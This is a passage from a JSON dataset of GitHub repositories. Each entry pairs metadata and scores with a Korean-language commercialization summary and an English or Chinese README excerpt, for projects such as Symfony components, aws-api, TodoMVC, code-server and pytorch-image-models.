is running in Kubernetes, our visualization tool will display all the Pods, Services, and Ingresses that allow you to drill down on Kubernetes clusters. The information provided to you includes but is not limited to the following:\n* Indicates the status of pods (blue for running, yellow for pending)\n* Lists the specific container images running within pods\n* ","composite_score":0.2072,"license_safety_tag":"safe"},{"name":"cognitect-labs/aws-api","github_url":"https://github.com/cognitect-labs/aws-api","stars":18,"language":"Clojure","license":"Apache-2.0","abandonment_months":0,"description":"# cognitect-labs/aws-api 분석 보고서\n\n## 왜 보물인가\n아마존(AWS) 클라우드 서비스와 쉽게 연결할 수 있도록 도와주는 도구라서, 클라우드를 사용하는 모든 회사에서 필요로 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: AWS 기반으로 구축된 클라우드 백업, 데이터 분석 플랫폼에서 AWS와의 연동을 간단하","readme_excerpt":"# aws-api\n\naws-api provides programmatic access to AWS services from Clojure programs.\n\n## Docs\n\n* [API](https://cognitect-labs.github.io/aws-api/)\n* [Data types for :request maps](https://github.com/cognitect-labs/aws-api/blob/main/doc/types.md)\n\n## Rationale\n\nAWS APIs are data-oriented in both the \"send data, get data back\"\nsense, and the fact that all of the operations and data structures for\nevery service are, themselves, described in data which can be used to\ngenerate mechanical transformations from application data to wire data\nand back. This is exactly what we want from a Clojure API.\n\nUsing the AWS Java SDK directly via interop requires knowledge of\nOO hierarchies of data classes, and while the existing Clojure wrappers\nhide much of this from you, they don't hide it from your process.\n\naws-api is an idiomatic, data-oriented Clojure library for\ninvoking AWS APIs.  While the library offers some helper and\ndocumentation functions you'll use at development time, the only\nfunctions ","composite_score":0.2069,"license_safety_tag":"safe"},{"name":"symfony/config","github_url":"https://github.com/symfony/config","stars":7,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# symfony/config 자산 분석\n\n## 왜 보물인가\n웹 애플리케이션의 설정 파일들을 체계적으로 관리하고 검증해주는 핵심 도구로, 복잡한 시스템 운영을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객별 맞춤 설정을 안전하게 저장·관리하는 백엔드 기능\n- **내부 업무 도구**: 회사 시스템의 각 부서별 설정을 중앙","readme_excerpt":"Config Component\n================\n\nThe Config component helps find, load, combine, autofill and validate\nconfiguration values of any kind, whatever their source may be (YAML, XML, INI\nfiles, or for instance a database).\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/config.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.2068,"license_safety_tag":"safe"},{"name":"doggy8088/Learn-Git-in-30-days","github_url":"https://github.com/doggy8088/Learn-Git-in-30-days","stars":5,"language":"","license":"unknown","abandonment_months":6,"description":"# Learn-Git-in-30-days 저장소 분석\n\n## 왜 보물인가\n버전 관리 시스템(Git)을 30일 안에 배울 수 있는 체계적인 학습 가이드로, 비개발자도 협업 도구의 기본을 이해할 수 있게 정리되어 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼(SaaS)**: 비전공자 대상 'Git 기초 입문' 강좌 판매로 월 구독 모델 운영","readme_excerpt":"# 30 天精通 Git 版本控管\n\n作者: 黃保翕 (Will 保哥)\n\n![Git](./zh-tw/figures/README/01.png)\n\n## 文章簡介\n\n在軟體開發領域，對原始碼進行版本控管是非常重要的一件事，有別於 Subversion 或 TFS 這類集中式版本控管系統，Git 是一套分散式版本控管系統，並帶來許多版本控管上的各種優勢與解決傳統集中式版本控管的缺失，例如支援本地操作、備份容易、功能強大且彈性的分支與合併等等。不過，由於 Git 版本控管無論在版控觀念與工具使用上，都與傳統集中式版控工具差異甚大，因此造成了不小的學習門檻，在未來的３０天內，希望能讓大家完整了解 Git 版本控管的精髓之處，並整理我的學習心得與我們公司從 Subversion 轉至 Git 的過程中所遭遇的問題與解決方法。\n\n## 旅程從現在開始\n\n* [中文版目錄](zh-tw/README.md)\n* [中文版目录 (简体)](zh-cn/README.md)\n* [English Version](en/README.md)\n\n## 獲獎紀錄\n\n* [2013 第 6 屆 iT 邦幫忙鐵人賽得獎名單出爐!](https://ithelp.ithome.com.tw/articles/10142953)\n  * 【iT 邦幫忙鐵人賽年度大獎】\n  * 【開發技術組年度鐵人】\n\n## 與我聯絡\n\n* 部落格: [The Will Will Web](https://blog.miniasp.com/)\n* 粉絲頁: [Will 保哥的技術交流中心](https://www.facebook.com/will.fans)\n* 推　特: [Will 保哥 (@Will_Huang)](https://twitter.com/Will_Huang)\n* 噗　浪: [★★★ Will 保哥的噗浪 ★★★](https://www.plurk.com/willh/invite)\n* Threads: [Will 保哥](https://www.threads.com/@willh_tw)\n\n## Stargazers\n\n[Stargazers repo roster for @doggy8088/Learn-Git-in-30-days](https://reporoste","composite_score":0.2067,"license_safety_tag":"unknown"},{"name":"symfony/process","github_url":"https://github.com/symfony/process","stars":10,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# Symfony Process 저장소 분석\n\n## 왜 보물인가\n복잡한 백그라운드 작업을 안전하고 간단하게 자동으로 실행할 수 있는 도구로, 대규모 웹서비스의 안정성을 크게 높여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이메일 자동 발송, 대량 데이터 처리, 정기적인 보고서 생성 같은 백그라운드 작업을 안정적으로 운영\n2. **내부 ","readme_excerpt":"Process Component\n=================\n\nThe Process component executes commands in sub-processes.\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/components/process.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n","composite_score":0.2065,"license_safety_tag":"safe"},{"name":"tastejs/todomvc","github_url":"https://github.com/tastejs/todomvc","stars":9,"language":"JavaScript","license":"NOASSERTION","abandonment_months":1,"description":"# TodoMVC 저장소 분석\n\n## 왜 보물인가\n할 일 관리 애플리케이션의 표준 템플릿으로, 새로운 개발 기술을 배우고 비교할 수 있는 교육용 레퍼런스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **팀 협업 도구 SaaS**: 프로젝트 관리나 업무 추적 기능이 필요한 팀 협업 플랫폼의 기초 아키텍처로 활용\n2. **기업 내부 업무 도구**: 직원들의","readme_excerpt":"# ![TodoMVC](media/logo.png)\n\n> Helping you select a JavaScript framework\n\n### [Website](http://todomvc.com)&nbsp;&nbsp;&nbsp;&nbsp;[Blog](http://blog.tastejs.com)&nbsp;&nbsp;&nbsp;&nbsp;[TasteJS](http://tastejs.com)\n\nDevelopers have a number of choices today when it comes to selecting a JavaScript framework or UI library for building scalable web apps.\n\nReact, Vue, Svelte, Angular, Solid, Lit... the list of solutions continues to grow, but just how do you decide on which to use in a sea of so many options?\n\nTo help solve this problem, we created TodoMVC - a project which offers the same Todo application implemented in most of the popular JavaScript frameworks of the day. Each example is functionally identical and follows the same [app specification](app-spec.md), so you can compare syntax, structure, and idioms side by side on equal footing.\n\nTodoMVC has been the de-facto teaching example for UI frameworks for over a decade, and forms the core of the cross-browser [Speedometer](https:","composite_score":0.2061,"license_safety_tag":"unknown"},{"name":"shaypal5/pdpipe","github_url":"https://github.com/shaypal5/pdpipe","stars":19,"language":"Jupyter Notebook","license":"MIT","abandonment_months":1,"description":"","readme_excerpt":"pdpipe ˨\n########\n\n|PyPI-Status| |Downloads| |PyPI-Versions| |Build-Status| |Codecov| |Codefactor| |CodeStyle| |LICENCE|\n\n\nWebsite: `https://pdpipe.readthedocs.io/en/latest/ <https://pdpipe.readthedocs.io/en/latest/>`_\n\nEasy pipelines for pandas DataFrames (`learn how! <https://tirthajyoti.github.io/Notebooks/Pandas-pipeline-with-pdpipe>`_).\n\n.. code-block:: python\n\n  >>> df = pd.DataFrame(\n          data=[[4, 165, 'USA'], [2, 180, 'UK'], [2, 170, 'Greece']],\n          index=['Dana', 'Jane', 'Nick'],\n          columns=['Medals', 'Height', 'Born']\n      )\n  >>> import pdpipe as pdp\n  >>> pipeline = pdp.ColDrop('Medals').OneHotEncode('Born')\n  >>> pipeline(df)\n              Height  Born_UK  Born_USA\n      Dana     165        0         1\n      Jane     180        1         0\n      Nick     170        0         0\n\n.. .. alternative symbols: ˨ ᛪ ᛢ ᚶ ᚺ ↬ ⑀ ⤃ ⤳ ⥤ 』\n\n.. contents::\n\n.. section-numbering::\n\n📚 Documentation\n================\n\nThis is the repository of the ``pdpipe`` package, and t","composite_score":0.206,"license_safety_tag":"safe"},{"name":"symfony/contracts","github_url":"https://github.com/symfony/contracts","stars":14,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Symfony Contracts 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션을 만드는 개발자들이 안정적인 규칙을 따르도록 도와주는 표준 설계도 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 다양한 고객사를 위한 웹 기반 소프트웨어를 만드는 회사가 품질 관리 도구로 판매\n2. **내부 업무 도구**: 대규모 기업의 IT팀이 직원","readme_excerpt":"Symfony Contracts\n=================\n\nA set of abstractions extracted out of the Symfony components.\n\nCan be used to build on semantics that the Symfony components proved useful - and\nthat already have battle tested implementations.\n\nDesign Principles\n-----------------\n\n * contracts are split by domain, each into their own sub-namespaces;\n * contracts are small and consistent sets of PHP interfaces, traits, normative\n   docblocks and reference test suites when applicable;\n * all contracts must have a proven implementation to enter this repository;\n * they must be backward compatible with existing Symfony components.\n\nPackages that implement specific contracts should list them in the \"provide\"\nsection of their \"composer.json\" file, using the `symfony/*-implementation`\nconvention (e.g. `\"provide\": { \"symfony/cache-implementation\": \"1.0\" }`).\n\nFAQ\n---\n\n### How to use this package?\n\nThe abstractions in this package are useful to achieve loose coupling and\ninteroperability. By using the prov","composite_score":0.206,"license_safety_tag":"safe"},{"name":"symfony/error-handler","github_url":"https://github.com/symfony/error-handler","stars":6,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Symfony Error Handler 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 발생하는 오류를 자동으로 감지하고 정리해주는 도구로, 개발자들이 문제를 빠르게 찾아 고칠 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객이 이용하는 클라우드 소프트웨어에 오류 모니터링 기능을 내장하여 서비스 품질 향상\n- **내부 업무 도","readme_excerpt":"ErrorHandler Component\n======================\n\nThe ErrorHandler component provides tools to manage errors and ease debugging PHP code.\n\nGetting Started\n---------------\n\n```bash\ncomposer require symfony/error-handler\n```\n\n```php\nuse Symfony\\Component\\ErrorHandler\\Debug;\nuse Symfony\\Component\\ErrorHandler\\ErrorHandler;\nuse Symfony\\Component\\ErrorHandler\\DebugClassLoader;\n\nDebug::enable();\n\n// or enable only one feature\n//ErrorHandler::register();\n//DebugClassLoader::enable();\n\n// If you want a custom generic template when debug is not enabled\n// HtmlErrorRenderer::setTemplate('/path/to/custom/error.html.php');\n\n$data = ErrorHandler::call(static function () use ($filename, $datetimeFormat) {\n    // if any code executed inside this anonymous function fails, a PHP exception\n    // will be thrown, even if the code uses the '@' PHP silence operator\n    $data = json_decode(file_get_contents($filename), true);\n    $data['read_at'] = date($datetimeFormat);\n    file_put_contents($filename, json_e","composite_score":0.2058,"license_safety_tag":"safe"},{"name":"madsys-dev/madsim","github_url":"https://github.com/madsys-dev/madsim","stars":6,"language":"Rust","license":"Apache-2.0","abandonment_months":3,"description":"# madsys-dev/madsim 상용화 분석\n\n## 왜 보물인가\n컴퓨터 시스템의 복잡한 동작을 안전하게 테스트할 수 있는 시뮬레이션 도구로, 버그를 사전에 찾아 서비스 장애를 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 서비스 업체의 신뢰성 검증 SaaS**\n- 금융, 의료, 통신사들이 자신의 시스템 안정성을 월 단위로 검증하는 ","readme_excerpt":"# MadSim\n\n[![Crate](https://img.shields.io/crates/v/madsim.svg)](https://crates.io/crates/madsim)\n[![Docs](https://docs.rs/madsim/badge.svg)](https://docs.rs/madsim)\n[![CI](https://github.com/madsim-rs/madsim/workflows/CI/badge.svg?branch=main)](https://github.com/madsim-rs/madsim/actions)\n\nMagical Deterministic Simulator for distributed systems.\n\n## Deterministic Simulation Testing\n\nMadSim is a Rust async runtime similar to tokio, but with a key feature called **deterministic simulation**.\n\nThe main idea is borrowed from [FoundationDB](https://www.youtube.com/watch?v=4fFDFbi3toc) and [sled simulation guide](https://sled.rs/simulation.html).\nYour code should be able to deterministically execute on top of a simulator.\nThe simulator will amplify randomness, create chaos and inject failures into your system.\nA lot of hidden bugs may be revealed, which you can then deterministically reproduce until they are fixed.\nIf your system can survive such chaos, you will have more confidence in depl","composite_score":0.2058,"license_safety_tag":"safe"},{"name":"erikras/final-form","github_url":"https://github.com/erikras/final-form","stars":11,"language":"TypeScript","license":"NOASSERTION","abandonment_months":1,"description":"# erikras/final-form 평가 분석\n\n## 왜 보물인가\n복잡한 온라인 양식 작성을 간단하게 만들어주는 도구로, 전자상거래부터 은행 서비스까지 고객 정보를 수집해야 하는 모든 업체에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회원 가입, 설정 변경, 결제 정보 입력 등 웹 애플리케이션의 모든 양식 관리\n2. **내부","readme_excerpt":"[<img src=\"form-nerd-logo.png\" align=\"left\"/>](https://formnerd.co/final-form-readme) **You build great forms, but do you know HOW users use your forms? [Find out with Form Nerd!](https://formnerd.co/final-form-readme) Professional analytics from the creator of Final Form.**\n\n---\n\n💰 **Hey there! Do you fancy yourself a javascript expert? [Take this quiz](https://triplebyte.com/a/V6j0KPS/ff) and get offers from top tech companies!** 💰\n\n---\n\n# 🏁 Final Form\n\n[![Final Form](banner.png)](https://final-form.org)\n\n[![Backers on Open Collective](https://opencollective.com/final-form/backers/badge.svg)](#backers)\n[![Sponsors on Open Collective](https://opencollective.com/final-form/sponsors/badge.svg)](#sponsors)\n[![NPM Version](https://img.shields.io/npm/v/final-form.svg?style=flat)](https://www.npmjs.com/package/final-form)\n[![NPM Downloads](https://img.shields.io/npm/dm/final-form.svg?style=flat)](https://npm-stat.com/charts.html?package=final-form)\n[![Build Status](https://travis-ci.org/fin","composite_score":0.2057,"license_safety_tag":"unknown"},{"name":"intel/parallelstl","github_url":"https://github.com/intel/parallelstl","stars":48,"language":"C++","license":"Apache-2.0","abandonment_months":0,"description":"# Intel Parallel STL 저장소 분석\n\n## 왜 보물인가\n컴퓨터의 여러 개 처리장치를 동시에 활용해 프로그램을 빠르게 실행하는 기술로, 대규모 데이터 처리가 필요한 기업들이 성능 향상을 위해 필수적으로 찾는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 데이터 분석 서비스**: 대량의 고객 정보나 판매 데이터를 빠르게 처리해주는 S","readme_excerpt":"# oneAPI DPC++ Library (oneDPL) <img align=\"right\" width=\"200\" height=\"100\" src=https://github.com/uxlfoundation/artwork/blob/main/foundation/uxl-foundation-logo-horizontal-color.svg>\n[![Apache License Version 2.0](https://img.shields.io/badge/license-Apache_2.0-green.svg)](LICENSE.txt) [![oneDPL CI](https://github.com/uxlfoundation/oneDPL/actions/workflows/ci-testing.yml/badge.svg)](https://github.com/uxlfoundation/oneDPL/actions/workflows/ci-testing.yml?query=branch%3Amaster)\n[![Join the community on GitHub Discussions](https://badgen.net/badge/join%20the%20discussion/on%20github/blue?icon=github)](https://github.com/uxlfoundation/oneDPL/discussions)\n[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/uxlfoundation/oneDPL/badge)](https://securityscorecards.dev/viewer/?uri=github.com/uxlfoundation/oneDPL)\n\noneDPL is part of the [UXL Foundation] and is an implementation of the\n[oneAPI specification] for the oneDPL component.\n\n[UXL Foundation]: http://www.uxlfou","composite_score":0.2057,"license_safety_tag":"safe"},{"name":"stylus/stylus","github_url":"https://github.com/stylus/stylus","stars":6,"language":"JavaScript","license":"mit","abandonment_months":13,"description":"# Stylus 저장소 분석\n\n## 왜 보물인가\n웹사이트의 디자인과 레이아웃을 효율적으로 만들어주는 기술로, 현대적이고 깔끔한 웹페이지를 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **웹사이트 빌더 SaaS**: 사용자가 직접 웹사이트를 만들 수 있는 플랫폼(Wix, Squarespace 경쟁)에 통합하여 디자인 작업을 간편하게 제공\n- *","readme_excerpt":"<p align=\"center\"><a href=\"https://stylus-lang.com\" target=\"_blank\" rel=\"noopener noreferrer\"><img width=\"150\" src=\"https://raw.githubusercontent.com/stylus/stylus/dev/graphics/Logos/stylus.png\" alt=\"Stylus logo\"></a></p>\n\n[![Build Status](https://github.com/stylus/stylus/actions/workflows/ci.yml/badge.svg?branch=dev)](https://github.com/stylus/stylus/actions?query=branch%3Adev)\n[![Maintenance](https://img.shields.io/badge/Maintained%3F-yes-brightgreen.svg)](https://github.com/stylus/stylus/pulse)\n[![npm version](https://img.shields.io/npm/v/stylus?color=brightgreen)](https://www.npmjs.com/package/stylus)\n[![npm](https://img.shields.io/npm/dm/stylus.svg)](https://www.npmjs.com/package/stylus)\n[![Join the community on github discussion](https://img.shields.io/badge/Join%20the%20community-on%20discussions-%23754ffb?logo=googlechat&logoColor=white)](https://github.com/stylus/stylus/discussions)\n\nStylus is a revolutionary new language, providing an efficient, dynamic, and expressive way to","composite_score":0.2056,"license_safety_tag":"safe"},{"name":"hyperapp/hyperapp","github_url":"https://github.com/hyperapp/hyperapp","stars":10,"language":"JavaScript","license":"mit","abandonment_months":14,"description":"# Hyperapp 저장소 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 없이 웹 애플리케이션을 빠르게 만들 수 있는 초경량 도구로, 스타트업이나 개인 개발자의 개발 속도를 획기적으로 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**\n빠른 프로토타입 제작으로 초기 시장 검증 시간을 단축하고, 내부 관리 대시보드를 저렴하게 구축할 수 있","readme_excerpt":"# Hyperapp\n\n> The tiny framework for building hypertext applications.\n\n- **Do more with less**—We have minimized the concepts you need to learn to get stuff done. Views, actions, effects, and subscriptions are all pretty easy to get to grips with and work together seamlessly.\n- **Write what, not how**—With a declarative API that's easy to read and fun to write, Hyperapp is the best way to build purely functional, feature-rich, browser-based apps using idiomatic JavaScript.\n- **Smaller than a favicon**—1 kB, give or take. Hyperapp is an ultra-lightweight Virtual DOM, [highly-optimized diff algorithm](https://javascript.plainenglish.io/javascript-frameworks-performance-comparison-2020-cd881ac21fce), and state management library obsessed with minimalism.\n\nHere's the first example to get you started. [Try it here](https://codepen.io/jorgebucaran/pen/zNxZLP?editors=1000)—no build step required!\n\n<!-- prettier-ignore -->\n```html\n<script type=\"module\">\n  import { h, text, app } from \"https://","composite_score":0.2055,"license_safety_tag":"safe"},{"name":"rwightman/pytorch-image-models","github_url":"https://github.com/rwightman/pytorch-image-models","stars":37,"language":"Python","license":"apache-2.0","abandonment_months":1,"description":"# pytorch-image-models 상용화 분석\n\n## 왜 보물인가\n사진과 이미지를 자동으로 인식하고 분석하는 인공지능 엔진을 누구나 쉽게 사용할 수 있는 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **이미지 검색 SaaS**: 옷이나 가구 사진을 올리면 유사 상품을 찾아주는 쇼핑 서비스\n2. **의료 영상 분석 API**: 병원에서 엑스레이","readme_excerpt":"# PyTorch Image Models\n- [What's New](#whats-new)\n- [Introduction](#introduction)\n- [Models](#models)\n- [Features](#features)\n- [Results](#results)\n- [Getting Started (Documentation)](#getting-started-documentation)\n- [Train, Validation, Inference Scripts](#train-validation-inference-scripts)\n- [Awesome PyTorch Resources](#awesome-pytorch-resources)\n- [Licenses](#licenses)\n- [Citing](#citing)\n\n## What's New\n## May 8, 2026\n* Release 1.0.27\n\n## April 23, 2026\n* Add Gemma4 ViT encoders w/ NaFlex pipeline support (variable aspect/size per image). Thanks [Yonghye Kwon](https://github.com/developer0hye)\n* Support DINOv3 weights in NaFlexVit. Thanks [Yonghye Kwon](https://github.com/developer0hye)\n* Some improvements to Muon fallback (AdamW/NadamW) lr behavior\n\n## March 23, 2026\n* Improve pickle checkpoint handling security. Default all loading to `weights_only=True`, add safe_global for ArgParse.\n* Improve attention mask handling for core ViT/EVA models & layers. Resolve bool masks, pass `is","composite_score":0.2055,"license_safety_tag":"safe"},{"name":"cdr/code-server","github_url":"https://github.com/cdr/code-server","stars":23,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# Code-Server 상용화 분석 보고서\n\n## 왜 보물인가\n어디서나 인터넷 브라우저만으로 프로그래밍 개발 환경을 사용할 수 있게 해주는 기술로, 개발자들의 작업 환경을 획기적으로 단순화합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 개발 환경 구독**\n- 기업과 개발자가 매달 구독료를 내고 언제 어디서든 개발 도구를 사용하는 ","readme_excerpt":"# code-server\n\n[![\"GitHub Discussions\"](https://img.shields.io/badge/%20GitHub-%20Discussions-gray.svg?longCache=true&logo=github&colorB=purple)](https://github.com/coder/code-server/discussions) [![\"Join us on Slack\"](https://img.shields.io/badge/join-us%20on%20slack-gray.svg?longCache=true&logo=slack&colorB=brightgreen)](https://coder.com/community) [![Twitter Follow](https://img.shields.io/twitter/follow/CoderHQ?label=%40CoderHQ&style=social)](https://twitter.com/coderhq) [![Discord](https://img.shields.io/discord/747933592273027093)](https://discord.com/invite/coder) [![codecov](https://codecov.io/gh/coder/code-server/branch/main/graph/badge.svg?token=5iM9farjnC)](https://codecov.io/gh/coder/code-server) [![See latest](https://img.shields.io/static/v1?label=Docs&message=see%20latest&color=blue)](https://coder.com/docs/code-server/latest)\n\nRun [VS Code](https://github.com/Microsoft/vscode) on any machine anywhere and\naccess it in the browser.\n\n![Screenshot](./assets/screenshot-1.png","composite_score":0.2055,"license_safety_tag":"safe"},{"name":"symfony/var-exporter","github_url":"https://github.com/symfony/var-exporter","stars":7,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Symfony Var-Exporter 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터를 간단한 텍스트 형태로 변환해주는 도구로, 웹 애플리케이션의 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 사용자 설정값이나 대량의 데이터를 빠르게 저장·로드해야 하는 클라우드 서비스에서 속도 개선용으로 판매\n2. **내부","readme_excerpt":"VarExporter Component\n=====================\n\nThe VarExporter component provides various tools to deal with the internal state\nof objects:\n\n- `VarExporter::export()` allows exporting any serializable PHP data structure to\n  plain PHP code. While doing so, it preserves all the semantics associated with\n  the serialization mechanism of PHP (`__wakeup`, `__sleep`, `Serializable`,\n  `__serialize`, `__unserialize`);\n- `DeepCloner` deep-clones PHP values while preserving copy-on-write benefits\n  for strings and arrays, making it faster and more memory efficient than\n  `unserialize(serialize())`;\n- `Lazy*Trait` can make a class behave as a lazy-loading ghost or virtual proxy.\n\nThe component depends on the native [`ext-deepclone`](https://github.com/symfony/php-ext-deepclone)\nextension for maximum performance, or on [its polyfill](https://github.com/symfony/polyfill/tree/main/src/DeepClone)\nas a fallback. In addition to functions `deepclone_to_array()` and `deepclone_from_array()`\nwhich are lev","composite_score":0.2053,"license_safety_tag":"safe"},{"name":"symfony/event-dispatcher-contracts","github_url":"https://github.com/symfony/event-dispatcher-contracts","stars":5,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# symfony/event-dispatcher-contracts 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 여러 기능들이 서로 신호를 주고받을 수 있게 해주는 기초 도구로, 큰 프로젝트일수록 필수적인 핵심 부품입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자 가입, 구매, 알림 등 다양한 이벤트가 발생할 때 자동으로 연쇄 작업을 처","readme_excerpt":"Symfony EventDispatcher Contracts\n=================================\n\nA set of abstractions extracted out of the Symfony components.\n\nCan be used to build on semantics that the Symfony components proved useful and\nthat already have battle tested implementations.\n\nSee https://github.com/symfony/contracts/blob/main/README.md for more information.\n","composite_score":0.2051,"license_safety_tag":"safe"},{"name":"openwisp/openwisp-users","github_url":"https://github.com/openwisp/openwisp-users","stars":10,"language":"Python","license":"BSD-3-Clause","abandonment_months":0,"description":"# OpenWISP Users 저장소 분석\n\n## 왜 보물인가\n사용자 계정과 권한을 관리하는 핵심 기능을 제공하므로, 온라인 서비스나 앱을 만드는 모든 기업에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **WiFi 관리 SaaS**: OpenWISP 플랫폼의 사용자 관리 기능으로, 공공 WiFi나 기업 네트워크 운영자가 사용자 접근 권한을 통제","readme_excerpt":"openwisp-users\n==============\n\n.. image:: https://github.com/openwisp/openwisp-users/actions/workflows/ci.yml/badge.svg\n    :target: https://github.com/openwisp/openwisp-users/actions/workflows/ci.yml\n\n.. image:: https://coveralls.io/repos/openwisp/openwisp-users/badge.svg\n    :target: https://coveralls.io/r/openwisp/openwisp-users\n\n.. image:: https://img.shields.io/librariesio/release/github/openwisp/openwisp-users\n    :target: https://libraries.io/github/openwisp/openwisp-users#repository_dependencies\n    :alt: Dependency monitoring\n\n.. image:: https://badge.fury.io/py/openwisp-users.svg\n    :target: http://badge.fury.io/py/openwisp-users\n\n.. image:: https://pepy.tech/badge/openwisp-users\n    :target: https://pepy.tech/project/openwisp-users\n    :alt: downloads\n\n.. image:: https://img.shields.io/badge/code%20style-black-000000.svg\n    :target: https://pypi.org/project/black/\n    :alt: code style: black\n\n----\n\nImplementation of user management and multi-tenancy for OpenWISP (built\nwit","composite_score":0.2051,"license_safety_tag":"safe"},{"name":"sentsin/layui","github_url":"https://github.com/sentsin/layui","stars":6,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# sentsin/layui 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱의 사용자 화면을 예쁘고 쉽게 만들어주는 디자인 도구 모음으로, 개발자가 없어도 기업에서 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업 업무 관리 프로그램(인사, 재무, 재고 등)의 사용자 인터페이스 구축\n- **내부 업무 도구**: 금융","readme_excerpt":"<div align=\"center\">\n\n<a href=\"https://layui.dev\">\n  <img src=\"https://unpkg.com/outeres@0.1.0/img/layui/logo-icon.png\" width=\"81\" alt=\"Layui\">\n</a>\n\n</div>\n\n# Layui\n\n中文 · [English](./README.en-US.md)\n\n原生态 Web UI 组件库\n\n<p>\n  <a href=\"https://github.com/layui/layui/actions/workflows/ci.yml\">\n    <img src=\"https://github.com/layui/layui/actions/workflows/ci.yml/badge.svg\" alt=\"CI Status\">\n  </a>\n  <a href=\"https://www.npmjs.com/package/layui\">\n    <img src=\"https://img.shields.io/npm/v/layui\" alt=\"NPM Version\">\n  </a>\n  <a href=\"https://github.com/layui/layui/blob/main/LICENSE\">\n    <img src=\"https://img.shields.io/github/license/layui/layui\" alt=\"License\">\n  </a>\n</p>\n\n> Layui 是一套开源免费的 Web UI 组件库，采用纯原生态的 HTML CSS JavaScript 开发模式，它为更便捷地构建现代 Web 界面而生。多年来，凭借别具一格的内外风格而被广泛应用。它给非前端开发者极大地降低了构建复杂网页界面的门槛，开发者只需面向浏览器，即可让页面所需呈现的元素与交互，变得信手拈来。\n\n## 使用文档\n\n- [**Layui 3**](https://github.com/layui/layui/issues/2889) （正在开发中）\n- [**Layui 2**](https://layui.dev/docs/2/)\n\n## 项目参与\n\n[项目参与者](https://github.com/la","composite_score":0.2048,"license_safety_tag":"safe"},{"name":"fossasia/foss.vn","github_url":"https://github.com/fossasia/foss.vn","stars":11,"language":"HTML","license":"Apache-2.0","abandonment_months":1,"description":"# fossasia/foss.vn 분석 보고서\n\n## 왜 보물인가\n베트남의 오픈소스 소프트웨어 생태계를 한곳에 모아주는 플랫폼으로, 지역 기술 커뮤니티의 신뢰성과 가시성을 동시에 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 베트남 스타트업들이 자신의 오픈소스 프로젝트를 등록하고 협력자를 찾을 수 있는 구인구직 플랫폼\n- **내","readme_excerpt":"Interpretation\n==========================\n\nThis is a plugin for `eventyay`_. \n\nA plugin for live interpretation of video streams\n\nDevelopment setup\n-----------------\n\n1. Make sure that you have a working `eventyay development setup`_.\n\n2. Clone this repository, e.g., to ``local/eventyay-interpretation``.\n\n3. Activate the `virtual environment <https://github.com/fossasia/eventyay?tab=readme-ov-file#getting-started>`_ you use for eventyay development.\n\n4. Execute ``uv pip install -e .`` within this directory to register this application with the eventyay plugin registry.\n\n5. Execute ``make`` within this directory to compile translations.\n\n6. Restart your local eventyay server. You can now use the plugin from this repository for your events by enabling it in\n   the 'plugins' tab in the settings.\n\nThis plugin has CI set up to enforce a few code style rules. To check locally, you need these packages installed::\n\n    pip install flake8 isort black\n\nTo check your plugin for rule violations, r","composite_score":0.2046,"license_safety_tag":"safe"},{"name":"pandera-dev/pandera","github_url":"https://github.com/pandera-dev/pandera","stars":6,"language":"Python","license":"MIT","abandonment_months":1,"description":"# Pandera 프로젝트 분석\n\n## 왜 보물인가\n데이터의 품질을 자동으로 검증하는 도구로, 기업이 잘못된 데이터로 인한 손실을 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 데이터 검증 플랫폼**: 기업들이 엑셀이나 데이터베이스에 입력된 정보의 정확성을 자동으로 확인하는 웹 서비스\n2. **내부 업무 도구**: 은행이나 보험사","readme_excerpt":"<br>\n<div align=\"center\"><a href=\"https://www.union.ai/pandera\"><img src=\"docs/source/_static/pandera-banner.png\" 